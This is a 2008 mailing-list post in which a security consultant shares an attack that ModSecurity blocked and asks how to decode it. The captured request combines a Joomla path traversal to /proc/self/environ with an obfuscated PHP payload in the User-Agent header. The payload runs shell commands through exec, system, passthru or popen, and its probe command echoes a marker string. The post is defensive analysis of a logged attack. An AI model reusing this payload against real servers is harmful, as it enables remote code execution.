[mod-security-users] Reading the encoded user agent info
Brought to you by:
victorhora,
zimmerletw
Menu
▾
▴
[mod-security-users] Reading the encoded user agent info
|
From: Albert E. W. <ae...@AB...> - 2008-09-14 20:45:49
|
Mod-Security has captured/blocked the attempt for a Path Traversal Attack. Here's the information from the Console: GET /index.php?option=com_webhosting&Itemid=&mosConfig_absolute_path=/../../../../../../.. \ /../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1Connection: close Host: www.abs-comptech.com User-Agent: <? $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x \ 11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x \ 63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; \ $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\1 \ 41\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\1 \ 63h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ gl \ obal $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c \ = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13("\n",$x0 \ c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x \ 16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17 \ ($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,"\x72"))){ $x0c = \ ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c \ ;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> How do I read this? -- Albert E. Whale, CHS CISA CISSP Sr. Security, Network, Risk Assessment and Systems Consultant ------------------------------------------------------------------------ ABS Computer Technology, Inc. <http://www.ABS-CompTech.com> - Email, Internet and Security Consultants SPAMZapper <http://www.Spam-Zapper.com> - No-JunkMail.com <http://www.No-JunkMail.com> - *True Spam Elimination*. |
